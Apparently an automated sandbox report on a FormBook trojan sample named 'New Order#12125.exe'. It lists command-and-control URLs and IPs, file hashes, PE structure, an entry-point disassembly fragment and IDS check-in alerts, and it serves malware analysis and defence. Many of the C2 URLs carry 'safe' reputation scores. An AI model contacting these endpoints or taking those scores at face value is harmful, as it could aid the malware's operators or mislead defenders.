              http://www.adadev.info/ctdy/?XxGx=INH0eLoh&60q4=5YPKgWGFQCLPNGrLxhxItoeNmOBaThMtkX9bUS/ECNXraKmEQnwhGYNyQa7ZIE66IC9AyTOQsA8Uagq2DQsZFRMH0zJP+kybsKdAAfaCKHAM6Zo7ldb4F8fWSMfSKwbdMw==100%Avira URL Cloudmalware
              http://www.investshares.net/cf9p/0%Avira URL Cloudsafe
              http://www.moyu19.pro/b9e2/0%Avira URL Cloudsafe
              http://www.promocao.info/zaz4/0%Avira URL Cloudsafe
              http://www.nosolofichas.online/hqr6/?60q4=zX0jw1Jb7ql8GILmYUO6wMs9InQYjg93TcA9XJSzUhKPf0bKw3wcZTcOExSEJIWiFeUL4na64vamMH1j0X3tfeyls16INcIZma1Jpk987Wy75kHMsLzMhDfgt4WvdaOefQ==&XxGx=INH0eLoh0%Avira URL Cloudsafe
              http://www.sonixingenuine.shop/01c7/0%Avira URL Cloudsafe
              http://www.lonfor.website/bowc/0%Avira URL Cloudsafe
              http://www.cifasnc.info/8rr3/0%Avira URL Cloudsafe
              http://www.denture-prices.click/dx3i/0%Avira URL Cloudsafe
              http://www.cifasnc.info/8rr3/?60q4=iJ8hmWjdEFuk0u06tRtBw99RNA0cmJToU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg+eEASr+Wzr+b0deN6ZH6lv1Dk2KgOeGcWS57RgWwvqcZEoOC4yFjEhnf2QufT28mA==&XxGx=INH0eLoh0%Avira URL Cloudsafe
              http://www.promocao.info/zaz4/?60q4=a/HH2smDyRg6YmpNlpDSiGBzLdYAcGrERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9Mtzddhhp4qHBhxLTG4/9m9WNTMgvCUOuzK4Dd8hoTr25U9f7tIQ==&XxGx=INH0eLoh0%Avira URL Cloudsafe
              http://cifasnc.info/xmlrpc.php0%Avira URL Cloudsafe
              http://www.grimbo.boats/kxtt/?XxGx=INH0eLoh&60q4=eC1oD4IhFSd/6jtL1AhIhKazMaYu9E65zKGW4KqWLMPitrzcqar0FZhKX10RVuOt75j4smH0EDZzb9gyazsXhz8HJcA2kRlIFQIbzI/ZykrVSnU5kYfD/4QtIXIX4MBGxA==0%Avira URL Cloudsafe
              http://www.moyu19.pro/b9e2/?60q4=KXKmlftrGUnNwN7yhNFRHhuh5Rs4DPRuyIFWo1edE1ybkp1zCkMUBe9/9dTIwO/9znAhfptP/ghbc5af4f99NOYW1ed+75fZ9khrC38pBidS91YBqsB3/Rw22POvSz2t7Q==&XxGx=INH0eLoh0%Avira URL Cloudsafe
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1590082
Start date and time: 2025-01-13 15:10:12 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 46s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: New Order#12125.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@5/1@16/10
EGA Information:
• Successful, ratio: 80%
HCA Information:
• Successful, ratio: 87%
• Number of executed functions: 14
• Number of non-executed functions: 329
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 52.149.20.212
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
Time | Type | Description
09:12:26 | API Interceptor | 10619846x Sleep call for process: fc.exe modified
                                                                      FG5wHs4fVX.exeGet hashmaliciousFormBookBrowse
                                                                      • 156.226.63.13
                                                                      smQoKNkwB7.exeGet hashmaliciousFormBookBrowse
                                                                      • 156.226.63.13
                                                                      qlG7x91YXH.exeGet hashmaliciousFormBookBrowse
                                                                      • 156.226.63.13
                                                                      http://38133.xc.05cg.com/Get hashmaliciousUnknownBrowse
                                                                      • 156.224.208.119
                                                                      http://40608.xc.05cg.com/Get hashmaliciousUnknownBrowse
                                                                      • 156.224.208.119
                                                                      emips.elfGet hashmaliciousMiraiBrowse
                                                                      • 156.250.110.142
                                                                      PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                                                                      • 154.197.162.239
                                                                      Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                      • 154.197.162.239
                                                                      VODANETInternationalIP-BackboneofVodafoneDECSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                                      • 47.83.1.90
                                                                      elitebotnet.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      • 92.208.12.103
                                                                      elitebotnet.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      • 188.100.79.179
                                                                      MACHINE SPECIFICATIONS.exeGet hashmaliciousFormBookBrowse
                                                                      • 47.83.1.90
                                                                      CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                                      • 47.83.1.90
                                                                      1001-13.exeGet hashmaliciousFormBookBrowse
                                                                      • 47.83.1.90
                                                                      6.elfGet hashmaliciousUnknownBrowse
                                                                      • 92.73.125.182
                                                                      6.elfGet hashmaliciousUnknownBrowse
                                                                      • 47.82.15.239
                                                                      res.arm5.elfGet hashmaliciousUnknownBrowse
                                                                      • 84.61.102.254
                                                                      res.x86.elfGet hashmaliciousUnknownBrowse
                                                                      • 178.9.17.19
                                                                      NAMECHEAP-NETUSCSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                                      • 199.192.21.169
                                                                      DOCS974i7C63.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                      • 198.54.116.113
                                                                      MACHINE SPECIFICATIONS.exeGet hashmaliciousFormBookBrowse
                                                                      • 199.192.21.169
                                                                      Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeGet hashmaliciousFormBookBrowse
                                                                      • 68.65.122.71
                                                                      CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                                      • 199.192.21.169
                                                                      1001-13.exeGet hashmaliciousFormBookBrowse
                                                                      • 162.0.236.169
                                                                      QsBdpe1gK5.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • 199.192.23.123
                                                                      rACq8Eaix6.exeGet hashmaliciousFormBookBrowse
                                                                      • 199.192.23.123
                                                                      plZuPtZoTk.exeGet hashmaliciousFormBookBrowse
                                                                      • 199.192.21.169
                                                                      5by4QM3v89.exeGet hashmaliciousFormBookBrowse
                                                                      • 199.192.23.123
                                                                      No context
                                                                      No context
Process: C:\Windows\SysWOW64\fc.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.1209886597424439
Encrypted: false
SSDEEP: 192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
MD5: EFD26666EAE0E87B32082FF52F9F4C5E
SHA1: 603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
SHA-256: 67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
SHA-512: 28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
Malicious: false
Reputation: moderate, very likely benign file
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.634842562323749
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: New Order#12125.exe
File size: 333'824 bytes
MD5: 2a0dfbfc319b0082f4fcdc47317e7f23
SHA1: 82f2785464db11931b8653f349a7d0b62502c1c5
SHA256: a117f2f0d37c6e467b308cb625140d64edab045f59a422c2c7ae671098a52748
SHA512: 4d9d80eda52a4e1fefe823b86666674ebc6340d8646d1699c6d337328f5b012e50da4e7e6c1aa9b965eb2125be979b81badf94c7208eeba833dcad01764af616
SSDEEP: 6144:s8ls/dPZs9JZY9iOKuxO9oTDFgxTFLVwkBDSiQ3roN6WL:u/dhQJqiOKsPDOZLGeDk3rk
TLSH: 6764121A5F25E202C4FD2A73796F4B4276794B2EBD192B11B4493CA65CA0C7F6EC03B1
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y...=`g.=`g.=`g.....:`g.....<`g.....<`g.Rich=`g.........PE..L......`.................X...................p....@................
Icon Hash: 73bc6156248d94a6
Entrypoint: 0x401580
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x60E3E289 [Tue Jul 6 04:56:41 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash:
                                                                      Instruction
                                                                      push ebp
                                                                      mov ebp, esp
                                                                      sub esp, 00000424h
                                                                      push ebx
                                                                      push esi
                                                                      push edi
                                                                      push 0000040Ch
                                                                      lea eax, dword ptr [ebp-00000420h]
                                                                      push 00000000h
                                                                      push eax
                                                                      mov dword ptr [ebp-00000424h], 00000000h
                                                                      call 00007F67A853713Ch
                                                                      add esp, 0Ch
                                                                      sub ecx, ecx
                                                                      xor edi, edi
                                                                      sub esi, esi
                                                                      mov dword ptr [ebp-14h], 00000054h
                                                                      mov dword ptr [ebp-10h], 00003B15h
                                                                      mov dword ptr [ebp-0Ch], 00001B0Dh
                                                                      mov dword ptr [ebp-08h], 00004BD2h
                                                                      mov edi, edi
                                                                      inc ecx
                                                                      mov eax, ecx
                                                                      and eax, 80000007h
                                                                      jns 00007F67A8535547h
                                                                      dec eax
                                                                      or eax, FFFFFFF8h
                                                                      inc eax
                                                                      jne 00007F67A8535544h
                                                                      add ecx, ecx
                                                                      cmp ecx, 00000CB4h
                                                                      jl 00007F67A8535527h
                                                                      mov ecx, 00006ACDh
                                                                      mov eax, 92492493h
                                                                      imul ecx
                                                                      add edx, ecx
                                                                      sar edx, 05h
                                                                      push edx
                                                                      pop ecx
                                                                      shr ecx, 1Fh
                                                                      add ecx, edx
                                                                      jne 00007F67A853552Dh
                                                                      mov eax, 00001819h
                                                                      push esi
                                                                      pop esi
                                                                      push 0000001Bh
                                                                      pop edx
                                                                      mov ecx, 000000C2h
                                                                      cmp ecx, edx
                                                                      cmovl ecx, edx
                                                                      dec eax
                                                                      jne 00007F67A853553Ah
                                                                      mov ecx, 00001F5Ah
                                                                      mov eax, 82082083h
                                                                      imul ecx
                                                                      add edx, ecx
                                                                      sar edx, 06h
                                                                      mov ecx, edx
                                                                      shr ecx, 1Fh
                                                                      add ecx, edx
                                                                      jne 00007F67A853552Dh
                                                                      call 00007F67A853739Ah
                                                                      mov dword ptr [ebp-5Ch], eax
                                                                      mov edi, edi
                                                                      inc edi
                                                                      mov eax, 55555556h
                                                                      imul edi
                                                                      Programming Language:
                                                                      • [C++] VS2012 build 50727
                                                                      • [ASM] VS2012 build 50727
                                                                      • [LNK] VS2012 build 50727
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x47000 | 0xadae | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x45694 | 0x45800 | 4b830bd6515e4b638ffbe7153f9b56f5 | False | 0.9886711724370504 | data | 7.995289145928988 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0x47000 | 0xadae | 0xae00 | 6540f80ae10b177d8854d082363de5b2 | False | 0.5349766522988506 | data | 3.786852869035346 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0x471a4 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | | | 0.34898843930635837 |
| RT_ICON | 0x4770c | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | | | 0.7125451263537906 |
| RT_ICON | 0x47fb4 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2688 | | | 0.6284648187633263 |
| RT_ICON | 0x48e5c | 0x1628 | Device independent bitmap graphic, 64 x 128 x 8, image size 4608 | | | 0.5784555712270804 |
| RT_ICON | 0x4a484 | 0x2ca8 | Device independent bitmap graphic, 96 x 192 x 8, image size 10368 | | | 0.5443491952414276 |
| RT_ICON | 0x4d12c | 0x4c28 | Device independent bitmap graphic, 128 x 256 x 8, image size 18432 | | | 0.5187217890849405 |
| RT_GROUP_ICON | 0x51d54 | 0x5a | data | | | 0.7555555555555555 |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-13T15:11:05.274132+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49757 | 154.39.239.237 | 80 | TCP |
| 2025-01-13T15:11:05.274132+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49757 | 154.39.239.237 | 80 | TCP |
| 2025-01-13T15:12:05.118293+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49707 | 47.83.1.90 | 80 | TCP |
| 2025-01-13T15:12:05.118293+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49707 | 47.83.1.90 | 80 | TCP |
| 2025-01-13T15:12:20.715447+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49709 | 84.32.84.32 | 80 | TCP |
| 2025-01-13T15:12:23.239953+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49710 | 84.32.84.32 | 80 | TCP |
| 2025-01-13T15:12:25.783859+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49711 | 84.32.84.32 | 80 | TCP |
| 2025-01-13T15:12:28.332119+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49713 | 84.32.84.32 | 80 | TCP |
| 2025-01-13T15:12:28.332119+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49713 | 84.32.84.32 | 80 | TCP |
| 2025-01-13T15:12:34.038776+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49714 | 104.21.18.171 | 80 | TCP |
| 2025-01-13T15:12:36.592127+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49715 | 104.21.18.171 | 80 | TCP |
| 2025-01-13T15:12:39.118648+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49716 | 104.21.18.171 | 80 | TCP |
| 2025-01-13T15:12:41.679730+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49717 | 104.21.18.171 | 80 | TCP |
| 2025-01-13T15:12:41.679730+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49717 | 104.21.18.171 | 80 | TCP |
| 2025-01-13T15:12:48.675328+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49718 | 134.122.135.48 | 80 | TCP |
| 2025-01-13T15:12:51.250228+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49719 | 134.122.135.48 | 80 | TCP |
| 2025-01-13T15:12:53.779143+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49720 | 134.122.135.48 | 80 | TCP |
| 2025-01-13T15:12:56.296137+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49721 | 134.122.135.48 | 80 | TCP |
| 2025-01-13T15:12:56.296137+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49721 | 134.122.135.48 | 80 | TCP |
| 2025-01-13T15:13:02.050209+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49722 | 199.192.21.169 | 80 | TCP |
| 2025-01-13T15:13:04.656922+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49723 | 199.192.21.169 | 80 | TCP |
| 2025-01-13T15:13:07.261861+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49724 | 199.192.21.169 | 80 | TCP |
| 2025-01-13T15:13:09.725455+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49725 | 199.192.21.169 | 80 | TCP |
| 2025-01-13T15:13:09.725455+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49725 | 199.192.21.169 | 80 | TCP |
| 2025-01-13T15:13:15.727465+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49726 | 154.197.162.239 | 80 | TCP |
| 2025-01-13T15:13:18.241415+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49727 | 154.197.162.239 | 80 | TCP |
| 2025-01-13T15:13:20.807234+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49728 | 154.197.162.239 | 80 | TCP |
| 2025-01-13T15:13:23.337048+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49729 | 154.197.162.239 | 80 | TCP |
| 2025-01-13T15:13:23.337048+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49729 | 154.197.162.239 | 80 | TCP |
| 2025-01-13T15:13:28.960302+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49730 | 84.32.84.32 | 80 | TCP |
| 2025-01-13T15:13:31.543843+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49731 | 84.32.84.32 | 80 | TCP |
| 2025-01-13T15:13:34.062236+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49732 | 84.32.84.32 | 80 | TCP |
| 2025-01-13T15:13:36.621759+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49733 | 84.32.84.32 | 80 | TCP |
| 2025-01-13T15:13:36.621759+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49733 | 84.32.84.32 | 80 | TCP |
| 2025-01-13T15:13:43.445036+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49734 | 134.122.135.48 | 80 | TCP |
| 2025-01-13T15:13:46.013616+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49735 | 134.122.135.48 | 80 | TCP |
| 2025-01-13T15:13:48.567336+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49736 | 134.122.135.48 | 80 | TCP |
| 2025-01-13T15:13:51.067776+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49737 | 134.122.135.48 | 80 | TCP |
| 2025-01-13T15:13:51.067776+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49737 | 134.122.135.48 | 80 | TCP |
| 2025-01-13T15:13:57.643124+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49738 | 47.83.1.90 | 80 | TCP |
| 2025-01-13T15:14:00.279215+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49739 | 47.83.1.90 | 80 | TCP |
| 2025-01-13T15:14:02.901606+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49740 | 47.83.1.90 | 80 | TCP |
| 2025-01-13T15:14:05.590151+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49741 | 47.83.1.90 | 80 | TCP |
| 2025-01-13T15:14:05.590151+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49741 | 47.83.1.90 | 80 | TCP |
| 2025-01-13T15:14:11.180458+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49742 | 188.114.96.3 | 80 | TCP |
| 2025-01-13T15:14:13.790127+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49743 | 188.114.96.3 | 80 | TCP |
| 2025-01-13T15:14:16.279625+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49744 | 188.114.96.3 | 80 | TCP |
| 2025-01-13T15:14:18.811617+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49745 | 188.114.96.3 | 80 | TCP |
| 2025-01-13T15:14:18.811617+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49745 | 188.114.96.3 | 80 | TCP |
                                                                      2025-01-13T15:14:32.502742+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849746199.59.243.22880TCP
                                                                      2025-01-13T15:14:35.068885+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849747199.59.243.22880TCP
                                                                      2025-01-13T15:14:37.604204+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849748199.59.243.22880TCP
                                                                      2025-01-13T15:14:40.163362+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849749199.59.243.22880TCP
                                                                      2025-01-13T15:14:40.163362+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849749199.59.243.22880TCP
                                                                      2025-01-13T15:14:46.757752+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84975013.228.81.3980TCP
                                                                      2025-01-13T15:14:49.304835+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84975113.228.81.3980TCP
                                                                      2025-01-13T15:14:51.335771+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84975213.228.81.3980TCP
                                                                      2025-01-13T15:14:53.914854+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.84975313.228.81.3980TCP
                                                                      2025-01-13T15:14:53.914854+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.84975313.228.81.3980TCP
                                                                      2025-01-13T15:15:02.353998+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849754154.39.239.23780TCP
                                                                      2025-01-13T15:15:04.898313+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849755154.39.239.23780TCP
                                                                      2025-01-13T15:15:07.445198+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849756154.39.239.23780TCP
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                      Jan 13, 2025 15:13:28.960227966 CET804973084.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:28.960302114 CET4973080192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:30.024398088 CET4973080192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:30.029493093 CET804973084.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:31.042870998 CET4973180192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:31.047909975 CET804973184.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:31.048012018 CET4973180192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:31.063648939 CET4973180192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:31.068676949 CET804973184.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:31.543752909 CET804973184.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:31.543843031 CET4973180192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:32.571286917 CET4973180192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:32.576141119 CET804973184.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:33.591233015 CET4973280192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:33.596251011 CET804973284.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:33.603240967 CET4973280192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:33.611244917 CET4973280192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:33.616053104 CET804973284.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:33.616205931 CET804973284.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:34.062084913 CET804973284.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:34.062236071 CET4973280192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:35.117630005 CET4973280192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:35.122725964 CET804973284.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:36.136015892 CET4973380192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:36.141133070 CET804973384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:36.143321991 CET4973380192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:36.152900934 CET4973380192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:36.157915115 CET804973384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:36.621598959 CET804973384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:36.621623993 CET804973384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:36.621634007 CET804973384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:36.621709108 CET804973384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:36.621720076 CET804973384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:36.621732950 CET804973384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:36.621742964 CET804973384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:36.621753931 CET804973384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:36.621758938 CET4973380192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:36.621767044 CET804973384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:36.621779919 CET804973384.32.84.32192.168.2.8
